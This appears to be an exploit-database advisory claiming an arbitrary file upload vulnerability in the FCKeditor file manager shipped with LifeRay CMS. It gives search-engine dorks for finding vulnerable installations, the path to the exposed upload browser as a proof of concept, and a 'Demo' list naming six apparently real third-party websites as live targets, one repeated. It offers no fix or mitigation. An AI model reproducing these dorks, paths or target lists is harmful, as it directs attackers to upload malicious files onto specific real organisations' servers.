[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability
[+] Date: 2020/04/10
[+] Author: h4shur
[+] Team: Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10
[+] Category : Web Application Bugs
[+} Dork : inurl:/web/guest/
inurl:/html/js/editor/fckeditor/
### Notes:
LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications.
### POC:
[+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
### Demo:
[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
### Special Thanks:
* Po0ri4 & b4ckdo0r
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur